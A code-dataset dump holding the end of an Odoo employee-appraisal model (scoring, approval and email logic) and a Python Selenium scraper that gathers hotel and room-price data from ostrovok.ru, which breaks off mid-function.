training_needs = fields.Text(string=\"Appraisee's training needs\")\r\n first_level_summary = fields.Text(string=\"First Level Summary of assessment\")\r\n second_level_summary = fields.Text(string=\"Second Level Summary of assessment\")\r\n kpr_assessment_comment = fields.Text(string=\"KPR Assessment Comment\")\r\n appraisee_comment = fields.Text(string=\"Appraisee's Comment\")\r\n confirm_submission = fields.Boolean(string=\"Confirm Submission\", default=False)\r\n kpi_assessment_lines = fields.Many2many(\r\n 'usl.kpi.assessment', \r\n 'usl_employee_appraisal_rel_1', \r\n 'kpi_attitude_assessment_1_id', \r\n string=\"KPI Questions\"\r\n )\r\n kpi_attitude_assessment_lines = fields.Many2many(\r\n 'usl.kpi.assessment', \r\n 'usl_employee_appraisal_rel', \r\n 'kpi_attitude_assessment_id', \r\n string=\"Attitude KPI Questions\"\r\n )\r\n balance_score = fields.Float(\r\n string=\"Balance Score\", \r\n compute=\"_compute_assessment_score\", \r\n help=\"Sum of balance score Total percentage in line\",\r\n store=True\r\n )\r\n attitude_appraisal_score = fields.Float(\r\n string=\"Attitude 
Appraisal Score\",\r\n compute=\"_compute_assessment_score\", \r\n help=\"Sum of attitude appraisal Total percentage in line\"\r\n )\r\n overall_total = fields.Float(\r\n string=\"Overall Total\", \r\n compute=\"_compute_overall_total\",\r\n store=True\r\n\r\n )\r\n days_remaining = fields.Integer(\r\n string=\"Days remaining\", \r\n compute=\"_compute_days_remaining\"\r\n )\r\n total_score = fields.Float(\r\n string=\"Total Score\", \r\n help=\"This is the overall total - the number of queries * 5 and number of warnings * 3\"\r\n )\r\n state = fields.Selection([\r\n ('Draft', 'Draft'),\r\n ('In progress', 'In progress'),\r\n ('Done', 'Done'),\r\n ('Locked', 'Locked'),\r\n ('Cancel', 'Cancel'),\r\n ], string=\"Status\", readonly=True)\r\n\r\n acceptance_status = fields.Selection([\r\n ('Accepted', 'Accepted'),\r\n ('Rejected', 'Rejected'),\r\n ], string=\"Acceptance Status\", readonly=True)\r\n \r\n result = fields.Selection([\r\n ('None', 'None'),\r\n ('A+', 'EXCEPTIONAL PERFORMANCE'),\r\n ('A', 'EXCEEDS EXPECTATION'),\r\n ('B', 'MEETS EXPECTATION'),\r\n ('C', 'ABOVE AVERAGE'),\r\n ('D', 'NEEDS IMPROVEMENT'),\r\n ('E', 'UNACCEPTABLE POOR PERFORMANCE'),\r\n ], string=\"Result\", default=\"None\", readonly=True)\r\n result_description = fields.Char(string=\"Performance description\", readonly=False)\r\n performance_band = fields.Char(string=\"Performance Band\", readonly=True)\r\n ho_comment = fields.Text(string=\"HOU's / HOD's Comment\")\r\n comments = fields.Text(string=\"General Comments\")\r\n commendation = fields.Boolean(string=\"Satisfactory\", default=False)\r\n queried = fields.Boolean(string=\"Queried\", default=False)\r\n warned = fields.Boolean(string=\"Warning to Improve\", default=False)\r\n dismissal = fields.Boolean(string=\"Dismissal\", default=False)\r\n confirm = fields.Boolean(string=\"Confirm\", default=False)\r\n absent = fields.Integer(string=\"Total Absent\", default=0)\r\n edit_mode = fields.Boolean(string=\"Edit mode\", default=False)\r\n appraisal_with_hr_manager = fields.Boolean(\r\n string=\"With HR manager\", \r\n default=False, store=True, \r\n compute=\"compute_appraisal_with_manager\")\r\n appraisal_with_hr_supervisor = fields.Boolean(\r\n string=\"With Supervisor\", default=False, \r\n store=True, compute=\"compute_appraisal_with_manager\"\r\n )\r\n extend_probation = fields.Boolean(string=\"Extend probation\", default=False)\r\n need_improvement = fields.Boolean(string=\"Needs Attitude Improvement\", default=False)\r\n number_queries = fields.Integer(string=\"Queries\")\r\n number_commendation = fields.Integer(string=\"Commendation\")\r\n number_warning = fields.Integer(string=\"Warning\")\r\n number_absent = fields.Integer(string=\"Absent\")\r\n number_appraisal = fields.Integer(string=\"Appraisal\")\r\n appraisal_year = fields.Char(\r\n string=\"Appraisal year\", \r\n compute=\"compute_appraisal_year\",\r\n store=True) \r\n\r\n @api.depends('date_from')\r\n def compute_appraisal_year(self):\r\n for rec in self:\r\n if rec.date_from:\r\n rec.appraisal_year = datetime.strptime(rec.date_from.strftime('%Y-%m-%d'), '%Y-%m-%d').year\r\n else:\r\n rec.appraisal_year = False \r\n\r\n @api.depends('directed_user_id')\r\n def compute_appraisal_with_manager(self):\r\n if self.directed_user_id:\r\n current_user = self.env['res.users'].browse([self.directed_user_id.id])\r\n supervisor = current_user.has_group(\"maach_hr_appraisal.group_supervisor\")\r\n manager = current_user.has_group(\"maach_hr_appraisal.group_appraisal_manager_id\")\r\n if supervisor:\r\n 
self.appraisal_with_hr_supervisor = True\r\n\r\n if manager:\r\n self.appraisal_with_hr_manager = True\r\n else:\r\n self.appraisal_with_hr_manager = False\r\n self.appraisal_with_hr_supervisor = False\r\n\r\n def action_rejected(self):\r\n if not self.employee_id.user_id.id == self.env.uid:\r\n raise ValidationError('Sorry!!! you are only allowed to reject your own approved Appraisal')\r\n self.acceptance_status = 'Rejected'\r\n\r\n def action_accepted(self):\r\n if not self.employee_id.user_id.id == self.env.uid:\r\n raise ValidationError('Sorry!!! you are only allowed to accept your own approved Appraisal')\r\n self.acceptance_status = 'Accepted'\r\n\r\n def _check_validation(self):\r\n if self.deadline:\r\n if fields.Date.today() > self.appraisal_config_id.deadline:\r\n raise ValidationError(\"You are not allowed to submit because the deadline has exceeded !!!\")\r\n\r\n def _message_post(self, template):\r\n \"\"\"Wrapper method for message_post_with_template\r\n Args:\r\n template (str): email template\r\n \"\"\"\r\n if template:\r\n ir_model_data = self.env['ir.model.data']\r\n template_id = ir_model_data.get_object_reference('maach_hr_appraisal', template)[1]\r\n self.message_post_with_template(\r\n template_id, composition_mode='comment',\r\n model='{}'.format(self._name), res_id=self.id,\r\n email_layout_xmlid='mail.mail_notification_light',\r\n )\r\n\r\n @api.depends('deadline')\r\n def _compute_days_remaining(self):\r\n for rec in self:\r\n if rec.deadline:\r\n now = fields.Date.today()\r\n # deadline = datetime.strptime(\r\n # rec.deadline, '%Y-%m-%d')\r\n difference = self.deadline - now\r\n rec.days_remaining = difference.days\r\n\r\n else:\r\n rec.days_remaining = False \r\n\r\n @api.depends('appraisal_config_id')\r\n def get_appraisal_deadline(self):\r\n for rec in self:\r\n if rec.appraisal_config_id:\r\n rec.deadline = rec.appraisal_config_id.deadline\r\n else:\r\n rec.deadline = False\r\n\r\n @api.depends('kpi_assessment_lines')\r\n def _compute_assessment_score(self):\r\n for rec in self:\r\n # balance_tasks = rec.mapped('kpi_assessment_lines').filtered(lambda x: x.kpi_topic_id.template_id.is_attitude_appraisal == False)\r\n balance_tasks = rec.mapped('kpi_assessment_lines').filtered(lambda x: x.kpi_topic_id.is_attitude_appraisal == False)\r\n balance_total = sum([it.total_percentage for it in balance_tasks])\r\n rec.balance_score = balance_total * 0.6\r\n\r\n attitude_tasks = rec.mapped('kpi_assessment_lines').filtered(lambda x: x.kpi_topic_id.is_attitude_appraisal == True)\r\n attitude_total = sum([it.total_percentage for it in attitude_tasks])\r\n rec.attitude_appraisal_score = (attitude_total / 100) * 40\r\n\r\n @api.onchange('balance_score', 'attitude_appraisal_score')\r\n def _compute_overall_total(self):\r\n for rec in self:\r\n tasks = rec.mapped('kpi_assessment_lines')\r\n total = sum([it.total_percentage for it in tasks])\r\n scores = rec.balance_score + rec.attitude_appraisal_score\r\n total = scores\r\n rec.overall_total = total # if not rec.attitude_appraisal_score else total\r\n\r\n # @api.depends('overall_total')\r\n def _compute_result(self):\r\n for rec in self:\r\n number_queries_warning = (rec.number_queries * 5) + (rec.number_warning * 3)\r\n total = rec.overall_total - number_queries_warning\r\n self.total_score = total\r\n result_domain = [('min_range', '<=', total), ('max_range', '>=', total)]\r\n result_config = self.env['usl.appraisal.result.config'].search(result_domain, limit=1)\r\n if result_config:\r\n rec.result_description = 
result_config.description\r\n                rec.result = result_config.result\r\n                rec.performance_band = result_config.performance_band\r\n\r\n    def action_set_progress(self):\r\n        self.state = \"In progress\"\r\n\r\n    def action_cancel(self):\r\n        self.state = \"Cancel\"\r\n\r\n    def action_set_draft(self):\r\n        self.state = \"Draft\"\r\n\r\n    def get_url(self, id, name):\r\n        base_url = http.request.env['ir.config_parameter'].sudo().get_param('web.base.url')\r\n        base_url += '/web#id=%d&view_type=form&model=%s' % (id, name)\r\n        return \"<a href='{}'> Click. </a>\".format(base_url)\r\n\r\n    def action_confirm(self):\r\n        if self.employee_id.user_id.id == self.env.uid:\r\n            raise ValidationError('Sorry!!! you are not allowed to approve your own Appraisal')\r\n        curr_emp_user = self.env['hr.employee'].search([('user_id', '=', self.env.uid)], limit=1)\r\n        self.set_approvers(curr_emp_user)\r\n        subject = \"Appraisal Notification\"\r\n        email_to = self.employee_id.work_email\r\n        email_cc = [rec.work_email for rec in self.approver_ids]\r\n        msg = \"Dear {},<br/>I wish to notify you that an appraisal with description, {} \\\r\n                by {} has been approved.<br/><br/>Kindly {} to review<br/>\\\r\n                Yours Faithfully<br/>{}\".format(\r\n            self.employee_id.name,\r\n            self.sequence, self.employee_id.name,\r\n            self.get_url(self.id, self._name),\r\n            self.env.user.name)\r\n        self.action_notify(subject, msg, email_to, email_cc)\r\n        self.state = \"Done\"\r\n        self._compute_result()\r\n\r\n    def set_approvers(self, empID=False):\r\n        if self.env.uid != self.employee_id.user_id.id:\r\n            curr_emp_user = self.env['hr.employee'].search([('user_id', '=', self.env.user.id)], limit=1)\r\n            if not empID:\r\n                raise ValidationError('No employee to direct to')\r\n            self.approver_ids = [(6, 0, [empID.id, curr_emp_user.id])]\r\n            dir_userid = self.env['hr.employee'].search([('id', '=', empID.id)], limit=1)\r\n            self.directed_user_id = dir_userid.user_id.id\r\n        self.state = \"In progress\"\r\n\r\n    def action_notify(self, subject, msg, email_to, email_cc):\r\n        subject = subject\r\n        email_from = self.env.user.email\r\n        email_ccs = list(filter(bool, email_cc))\r\n        recipients = (','.join(items for items in email_ccs)) if email_ccs else False\r\n        mail_data = {\r\n            'email_from': email_from,\r\n            'subject': subject,\r\n            'email_to': email_to,\r\n            'reply_to': email_from,\r\n            'email_cc': recipients,\r\n            'body_html': msg\r\n        }\r\n        mail_id = self.env['mail.mail'].sudo().create(mail_data)\r\n        self.env['mail.mail'].sudo().send(mail_id)\r\n        self.message_post(body=msg)\r\n\r\n    def stat_button_query(self):\r\n        pass\r\n\r\n    def stat_button_number_commendation(self):\r\n        pass\r\n\r\n    def stat_button_warning(self):\r\n        pass\r\n\r\n    def stat_button_absent(self):\r\n        pass\r\n\r\n    def stat_button_total_appraisal(self):\r\n        pass\r\n\r\n    def withdraw_appraisal_action(self):\r\n        self.directed_user_id = False # self.env.user.id\r\n\r\n    def forward_action(self):\r\n        self._check_validation()\r\n        dummy, view_id = self.env['ir.model.data'].get_object_reference('maach_hr_appraisal', 'memo_hr_appraisal_model_forward_wizard')\r\n        return {\r\n            'name': 'Forward',\r\n            'view_type': 'form',\r\n            'view_id': view_id,\r\n            \"view_mode\": 'form',\r\n            'res_model': 'memo.appraisal.foward.wizard',\r\n            'type': 'ir.actions.act_window',\r\n            'target': 'new',\r\n            'context': {\r\n                'default_memo_record': self.id,\r\n                'default_resp': self.env.uid,\r\n                'default_type': \"forward\",\r\n                'default_directed_user_id': self.employee_id.department_id.manager_id.user_id.id or self.employee_id.parent_id.user_id.id,\r\n            },\r\n        }\r\n\r\n    def return_action(self):\r\n        dummy, view_id = self.env['ir.model.data'].get_object_reference('maach_hr_appraisal', 'memo_hr_appraisal_model_forward_wizard')\r\n        return {\r\n            'name': 'Return',\r\n            'view_type': 'form',\r\n            'view_id': view_id,\r\n            \"view_mode\": 'form',\r\n            'res_model': 'memo.appraisal.foward.wizard',\r\n            'type': 'ir.actions.act_window',\r\n            'target': 'new',\r\n            'context': {\r\n                'default_memo_record': self.id,\r\n                'default_type': \"return\",\r\n                'default_resp': self.env.uid,\r\n            },\r\n        }\r\n\r\n    def add_queries(self):\r\n        '''This increments the number of queries by 1 and also deducts 5 from the overall total, which\r\n        affects the performance band / result\r\n        '''\r\n        self.number_queries = self.number_queries + 1\r\n\r\n    def remove_queries(self):\r\n        '''This decrements the number of queries by 1\r\n        '''\r\n        if self.number_queries > 0:\r\n            self.number_queries = self.number_queries - 1\r\n\r\n    def add_warning(self):\r\n        '''This increments the number of warnings by 1 and also deducts 3 from the overall total, which\r\n        affects the performance band / result\r\n        '''\r\n        self.number_warning = self.number_warning + 1\r\n\r\n    def remove_warning(self):\r\n        if self.number_warning > 
0:\r\n self.number_warning = self.number_warning - 1\r\n\r\n @api.model\r\n def fields_view_get(self, view_id='maach_hr_appraisal.usl_employee_appraisal_form_view', view_type='form', toolbar=False, submenu=False):\r\n res = super(HrEmployeeAppraisal, self).fields_view_get(view_id=view_id,\r\n view_type=view_type,\r\n toolbar=toolbar,\r\n submenu = submenu)\r\n doc = etree.XML(res['arch'])\r\n for rec in self: #.approver_ids:\r\n if rec.directed_user_id.id == self.env.uid:\r\n for node in doc.xpath(\"//button[@name='forward_action']\"):\r\n node.set('modifiers', '{\"invisible\": false}')\r\n\r\n if rec.employee_id.user_id.id == self.env.uid:\r\n for node in doc.xpath(\"//button[@name='return_action']\"):\r\n node.set('modifiers', '{\"invisible\": true}')\r\n\r\n for node in doc.xpath(\"//button[@name='withdraw_appraisal_action']\"):\r\n node.set('modifiers', '{\"invisible\": true}')\r\n\r\n res['arch'] = etree.tostring(doc)\r\n return res\r\n\r\n def unlink(self):\r\n for record in self.filtered(lambda record: record.state not in ['Draft','Cancel']):\r\n raise ValidationError(_('In order to delete an Appraisal, you must cancel it first...'))\r\n return super(HrEmployeeAppraisal, self).unlink()\r\n \r\n def write(self, vals):\r\n \"\"\"\r\n Any time an approver changes this options, \r\n the system adds 1 if True else deducts 1\r\n This is used to count the number of queries, \r\n warning by any approver\r\n \"\"\"\r\n # for rec in self:\r\n # self.validate_user_edit()\r\n res = super(HrEmployeeAppraisal, self).write(vals)\r\n if 'queried' in vals and vals.get('queried') == True:\r\n self.update({'number_queries': self.number_queries + 1})\r\n if 'warned' in vals and vals.get('warned') == True:\r\n self.update({'number_warning': self.number_warning + 1})\r\n if 'commendation' in vals and vals.get('commendation') == True:\r\n self.update({'number_commendation': self.number_commendation + 1})\r\n if 'absent' in vals and vals.get('absent') == True:\r\n self.update({'number_absent': self.number_absent + 1})\r\n return res\r\n\r\n","repo_name":"madux/usil-erp","sub_path":"maach_hr_appraisal/models/employee_appraisee.py","file_name":"employee_appraisee.py","file_ext":"py","file_size_in_byte":18838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1477653863","text":"import copy\nimport datetime\nimport json\nimport os\nimport re\nimport subprocess\nimport concurrent.futures\nimport sys\nimport traceback\nfrom urllib.parse import urlencode, urlparse, parse_qs, urlunparse\nimport requests\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport threading\nimport time\nimport logging\n\n# Настроки\nsimultaneous_parsing = 3\n\nclass MyLog:\n logger : logging.Logger\n\n def __init__(self, id) -> None:\n self.logger = self.create_logger(id)\n # subprocess.Popen(['python', 'print_log.py', f'r_logs/logger_{id}.log'], stdin=subprocess.PIPE)\n\n def create_logger(self, id):\n # создаем логгер\n logger = logging.getLogger(f\"logger_{id}\")\n handler = logging.FileHandler(filename=f'r_logs/logger_{id}.log', mode='w', encoding='utf-8')\n handler.setFormatter(logging.Formatter('%(message)s'))\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)\n\n return logger\n\n def log(self, mes):\n self.logger.info(mes)\n\ndef split_list(lst, n):\n \"\"\"\n Разделение списка 
на n подсписков примерно равной длины\n \"\"\"\n size = len(lst) // n\n remainder = len(lst) % n\n result = []\n start = 0\n for i in range(n):\n end = start + size + (i < remainder)\n result.append(lst[start:end])\n start = end\n return result\n\ndef update_query_params(url, new_values):\n parsed_url = urlparse(url)\n query_dict = parse_qs(parsed_url.query)\n\n for key, value in new_values.items():\n query_dict[key] = value\n\n new_query = urlencode(query_dict, doseq=True)\n updated_url = urlunparse((parsed_url.scheme, parsed_url.netloc,\n parsed_url.path, parsed_url.params, new_query, parsed_url.fragment))\n\n return updated_url\n\ndef create_webdriver():\n # Create a new instance of the Chrome driver\n chrome_options = webdriver.ChromeOptions()\n\n # Отключение загрузки картинок\n prefs = {\"profile.managed_default_content_settings.images\": 2}\n chrome_options.add_experimental_option(\"prefs\", prefs)\n\n # Отключение загрузки шрифтов и css\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--disable-infobars')\n chrome_options.add_argument('--disable-dev-shm-usage')\n chrome_options.add_argument('--disable-gpu')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-setuid-sandbox')\n chrome_options.add_argument('--disable-web-security')\n chrome_options.add_argument('--disable-features=VizDisplayCompositor')\n chrome_options.add_argument('--disable-logging')\n chrome_options.add_argument('--disable-logging-redirect')\n chrome_options.add_argument('--disable-background-networking')\n chrome_options.add_argument('--disable-breakpad')\n chrome_options.add_argument('--disable-client-side-phishing-detection')\n chrome_options.add_argument('--disable-component-update')\n chrome_options.add_argument('--disable-default-apps')\n chrome_options.add_argument('--disable-extensions-http-throttling')\n chrome_options.add_argument('--disable-extensions-file-access-check')\n chrome_options.add_argument('--disable-extensions-scheme-whitelist')\n chrome_options.add_argument('--disable-hang-monitor')\n chrome_options.add_argument('--disable-ipc-flooding-protection')\n chrome_options.add_argument('--disable-popup-blocking')\n chrome_options.add_argument('--disable-prompt-on-repost')\n chrome_options.add_argument('--disable-renderer-backgrounding')\n chrome_options.add_argument('--disable-sync')\n chrome_options.add_argument('--disable-translate')\n chrome_options.add_argument('--metrics-recording-only')\n chrome_options.add_argument('--mute-audio')\n chrome_options.add_argument('--no-first-run')\n chrome_options.add_argument('--safebrowsing-disable-auto-update')\n chrome_options.add_argument('--start-maximized')\n chrome_options.add_argument('--disable-webgl')\n chrome_options.add_argument('--disable-threaded-animation')\n chrome_options.add_argument('--disable-threaded-scrolling')\n chrome_options.add_argument('--disable-web-security')\n chrome_options.add_argument('--disable-xss-auditor')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--ignore-certificate-errors')\n # chrome_options.add_argument('--headless')\n chrome_options.add_argument('--disk-cache=true')\n chrome_options.add_argument('--log-level=3')\n\n driver = webdriver.Chrome(chrome_options=chrome_options)\n\n # driver.request_interceptor = interceptor\n\n return driver\n\ndrivers = [create_webdriver() for i in range(simultaneous_parsing)]\n\ndef parser_hotel_rooms(url, driver, logger : MyLog):\n return_urls = []\n dates = [\n 
[\"28.07.2023-01.08.2023\", 4],\n [\"28.08.2023-01.09.2023\", 4],\n [\"05.10.2023-08.10.2023\", 3]\n ]\n\n retrun_rooms: dict[str, dict[str, list]] = {}\n\n additional_values = None\n\n operation_counter = 0\n operation_counter_max = 3 * 4\n\n for date, days in dates:\n for guests in range(1, 5):\n url = update_query_params(url, {\"dates\": date, \"guests\": guests})\n return_urls.append(url)\n operation_counter += 1\n\n if additional_values == None:\n additional_values, rooms = parser_room(\n url, driver, True, date, days, guests)\n else:\n _, rooms = parser_room(url, driver, False, date, days, guests)\n\n logger.log(f\"[{operation_counter}/{operation_counter_max}] {date} | {guests} => {len(rooms)}\")\n # logging.info(f\"[{operation_counter}/{operation_counter_max}] {date} | {guests} => {len(rooms)}\")\n\n for key, val in rooms.items():\n if not retrun_rooms.get(key):\n retrun_rooms[key] = {\n \"price\": [],\n \"amenity\": None,\n \"search\": [],\n }\n\n retrun_rooms[key][\"price\"].append(val[\"price\"])\n retrun_rooms[key][\"search\"].append(val[\"search\"])\n\n if retrun_rooms[key][\"amenity\"] == None:\n retrun_rooms[key][\"amenity\"] = val[\"amenity\"]\n\n # [Название] Цена | Гостей => Количество захваченных поисков\n logger.log(f\"Информация об номерах [{len(retrun_rooms)}]:\")\n for key, val in retrun_rooms.items():\n prices = [round(price[\"price\"] / price[\"days\"])\n for price in val[\"price\"]]\n max_price = max(prices)\n\n guests = [search[\"guests\"] for search in val[\"search\"]]\n max_guest = max(guests)\n\n logger.log(f\"[{key}] ↑{max_price} | ↑{max_guest} => s{len(val['search'])}\")\n\n return retrun_rooms, additional_values, return_urls\n\ndef parser_room(url, driver, get_additional_values: bool, date, days, guests):\n rooms: dict[str, list] = {}\n\n additional_values = None\n\n driver.get(url)\n\n # ждем полной загрузки страницы\n driver.execute_script(\"return document.readyState\")\n\n scripts = driver.find_elements(\n \"xpath\", \"//script[@type='text/javascript']\")\n\n for script in scripts:\n try:\n driver.execute_script(script.get_attribute('innerHTML'))\n except:\n pass\n\n if additional_values == None:\n additional_values = {}\n try:\n title_stars = driver.find_element(\n By.CLASS_NAME, \"zen-roomspage-title-stars\")\n stars = title_stars.find_elements(\n By.CLASS_NAME, \"zen-ui-stars-star\")\n additional_values[\"stars_count\"] = len(stars)\n except:\n additional_values[\"stars_count\"] = 0\n\n try:\n span_time_in_out = driver.find_elements(\n By.CLASS_NAME, \"PolicyBlock__policyTableCell_checkInCheckOut--sezvV\")\n\n for obj in span_time_in_out:\n if obj.text.startswith(\"После\"):\n additional_values[\"time_in\"] = obj.text.replace(\n \"После\", \"\").strip()\n if obj.text.startswith(\"До\"):\n additional_values[\"time_out\"] = obj.text.replace(\n \"До\", \"\").strip()\n pass\n except:\n additional_values[\"time_in\"] = \"12:00\"\n additional_values[\"time_out\"] = \"14:00\"\n\n additional_values[\"title\"] = driver.title\n\n try:\n # Ожидание появления элемента с классом zenroomspage-b2c-rates\n rates = WebDriverWait(driver, timeout=3).until(\n lambda d: d.find_elements(By.CLASS_NAME, \"zenroomspage-b2c-rates\"))\n except:\n rates = []\n\n for rate in rates:\n name = rate.find_element(\n By.CLASS_NAME, \"zenroomspagerate-name-title\").text\n name = name.replace(\"\\n\", \" \")\n\n if not rooms.get(name):\n rooms[name] = {\n \"price\": None,\n \"amenity\": [],\n \"search\": None,\n }\n\n rooms[name][\"search\"] = {\n \"date\": {\"start\": date, \"days\": 
days}, \"guests\": guests}\n\n price = rate.find_elements(\n By.CLASS_NAME, \"zenroomspage-b2c-rates-price-amount\")[0].text\n price = int(price.replace(\" \", \"\").replace(\"₽\", \"\"))\n\n rooms[name][\"price\"] = {\"price\": price, \"days\": days}\n\n if len(rooms[name][\"amenity\"]) == 0:\n amenitys = rate.find_elements(\n By.CLASS_NAME, \"zenroomspageroom-header-content-amenity\")\n for amenity in amenitys:\n text_amenity = amenity.text\n rooms[name][\"amenity\"].append(text_amenity)\n\n return additional_values, rooms\n\ndef get_hotel(url_hotel, hotel_id, driver, logger : MyLog):\n start_time = int(time.time())\n\n url = \"https://ostrovok.ru/hotel/search/v2/site/hp/content\"\n params = {\n \"lang\": \"ru\",\n \"hotel\": hotel_id,\n }\n\n response = requests.get(url, params=params)\n json_data = response.json()\n\n amenities = {}\n\n for group in json_data[\"data\"][\"hotel\"][\"amenity_groups_v2\"]:\n category = group[\"group_name\"]\n amenities[category] = []\n for amenity in group[\"amenities\"]:\n name = amenity[\"name\"]\n amenities[category].append(name)\n\n address_parts = json_data[\"data\"][\"hotel\"][\"address\"].split(', ')\n street = address_parts[0]\n house_number = address_parts[1]\n city = json_data[\"data\"][\"hotel\"][\"city\"]\n country = json_data[\"data\"][\"hotel\"][\"country\"]\n\n description = json_data[\"data\"][\"hotel\"][\"description\"]\n\n images = []\n\n for img in json_data[\"data\"][\"hotel\"][\"images\"]:\n w = img[\"width\"]\n h = img[\"height\"]\n\n url: str = img[\"tmpl\"]\n\n url = url.replace(\"{size}\", \"1024x768\")\n\n images.append({\n \"url\": url,\n })\n\n latitude = json_data[\"data\"][\"hotel\"][\"latitude\"]\n longitude = json_data[\"data\"][\"hotel\"][\"longitude\"]\n\n name = json_data[\"data\"][\"hotel\"][\"name\"]\n\n rooms_data_parser_selenium, additional_data, return_urls = parser_hotel_rooms(\n url_hotel, driver, logger)\n\n rooms = []\n\n room_groups = json_data[\"data\"][\"hotel\"][\"room_groups\"]\n\n for room in room_groups:\n if not rooms_data_parser_selenium.get(room[\"name\"]):\n continue\n\n date_room = {\n \"name\": room[\"name\"],\n \"size\": room.get(\"size\"),\n \"amenitie\": [item for item in rooms_data_parser_selenium[room[\"name\"]][\"amenity\"]],\n \"search\": rooms_data_parser_selenium[room[\"name\"]][\"search\"],\n \"visibility_area\": {\n \"date\": [],\n },\n \"rg_hash\": room[\"rg_hash\"],\n }\n\n days_list = [search[\"date\"][\"days\"]\n for search in rooms_data_parser_selenium[room[\"name\"]][\"search\"]]\n guests = {\n \"max\": max(days_list) if days_list else None,\n \"min\": min(days_list) if days_list else None,\n }\n\n days_list = [search[\"date\"][\"days\"]\n for search in rooms_data_parser_selenium[room[\"name\"]][\"search\"]]\n days = {\n \"max\": max(days_list) if days_list else None,\n \"min\": min(days_list) if days_list else None,\n }\n\n guests_list = [search[\"guests\"]\n for search in rooms_data_parser_selenium[room[\"name\"]][\"search\"]]\n guests = {\n \"max\": max(guests_list) if guests_list else None,\n }\n\n date_room[\"visibility_area\"][\"days\"] = days\n date_room[\"visibility_area\"][\"guests\"] = guests\n\n date_room[\"imgs\"] = []\n if rooms_data_parser_selenium.get(room[\"name\"]):\n date_room[\"price\"] = rooms_data_parser_selenium[room[\"name\"]][\"price\"]\n else:\n date_room[\"price\"] = 0\n\n for img in room[\"image_list_tmpl\"]:\n w = img[\"width\"]\n h = img[\"height\"]\n\n url: str = img[\"src\"]\n\n url = url.replace(\"{size}\", \"1024x768\")\n\n 
date_room[\"imgs\"].append({\n \"url\": url,\n \"size\": f\"{w}x{h}\",\n })\n\n rooms.append(date_room)\n\n end_time = int(time.time())\n\n hotel_data = {\n \"debug\": {\n \"start_time\": datetime.datetime.fromtimestamp(start_time).strftime(\"%d.%m.%Y %H:%M:%S\"),\n \"end_time\": datetime.datetime.fromtimestamp(end_time).strftime(\"%d.%m.%Y %H:%M:%S\"),\n \"d_time_m\": f\"{round((end_time - start_time) / 60, 1)} минут\",\n \"d_time_s\": f\"{(end_time - start_time)} секунд\",\n },\n \"urls\": return_urls,\n \"name_hotel\": name,\n \"address\": {\n \"street\": street,\n \"house\": house_number,\n \"city\": city,\n \"continent\": country,\n },\n \"description\": description,\n \"images\": images,\n \"coordinates\": {\n \"latitude\": latitude,\n \"longitude\": longitude,\n },\n \"description\": description,\n \"services\": amenities,\n \"rooms\": rooms,\n }\n\n hotel_data.update(additional_data)\n\n logger.log(f\"Скачался за {hotel_data['debug']['d_time_s']}\")\n\n return hotel_data\n\nurls = []\n\n# cities = {}\n# with open(\"slug.json\", encoding='utf-8') as f:\n# data = json.load(f)\n# for slug in data:\n# slug: str\n# city = slug.split(\"/\")[1]\n# cities[city] = slug\n\n\nif not os.path.exists(\"hotels/empty/\"):\n os.mkdir(\"hotels/empty/\")\n\nif not os.path.exists(\"hotels/normal/\"):\n os.mkdir(\"hotels/normal/\")\n\nthere_are_already_hotels = []\n\nfor filename in os.listdir('hotels'):\n if filename.endswith('.json'):\n there_are_already_hotels.append(filename.split(\".\")[0])\n\n\nfull_count_hotel = 0\n\n# Цикл для чтения каждого файла в папке\nfor filename in os.listdir('cities/full'):\n if filename.endswith('.json'):\n with open(os.path.join('cities/full', filename), encoding='utf-8') as f:\n data = json.load(f)\n index, city = filename.split(\"_\", 1)\n city = city.replace(\".json\", \"\")\n\n for hotel in data[\"hotels\"]:\n full_count_hotel += 1\n slug = f\"russia/{city}\"\n if city not in there_are_already_hotels:\n obj = {\n \"city\": city,\n \"url\": f\"https://ostrovok.ru/hotel/{slug}/mid9287753/{hotel['ota_hotel_id']}/?dates=20.09.2023-29.09.2023&guests=1\",\n \"id_hotel\": hotel['ota_hotel_id']\n }\n urls.append(obj)\n\nindex_urls = 0\n\n\ndef find_files(path, extension):\n list = []\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(extension):\n list.append(file.split(\".\")[0])\n\n return list\n\n\nthere_are_already_hotels = find_files(\"hotels\", '.json')\n\nprint(f\"Всего отелей {full_count_hotel}, уже скачено {len(there_are_already_hotels)}, нужно ещё {len(urls)} скачать\")\n\nif not os.path.exists(\"r_logs/\"):\n os.mkdir(\"r_logs/\")\n\ndef while_hotel(urls, id, mixing_id, there_are_already_hotels, driver):\n \"\"\"Основной цикт получения отелей\n\n Args:\n `urls` (list): Список с url и slug\\n\n `id` (int): ID цикла\\n\n `mixing_id` (int): Смешение вывода index_urls\\n\n `there_are_already_hotels` (list): Отели который уже скачены\n \"\"\"\n logger = MyLog(id)\n index_urls = 0\n while index_urls < len(urls):\n try:\n url = urls[index_urls]\n\n if url[\"id_hotel\"] in there_are_already_hotels:\n index_urls += 1\n logger.log(f\"[{index_urls+mixing_id}/{len(urls)+mixing_id}] {url['id_hotel']} уже есть\")\n # logger.log(f\"[{index_urls+mixing_id}/{len(urls)}] {url['id_hotel']} уже есть\")\n continue\n\n logger.log(f\"[{index_urls+mixing_id+1}/{len(urls)+mixing_id}] {url['city']} => {url['id_hotel']} скачивается\")\n # logger.log(\n # f\"[{index_urls+mixing_id+1}/{len(urls)+mixing_id}] {url['city']} => {url['id_hotel']} 
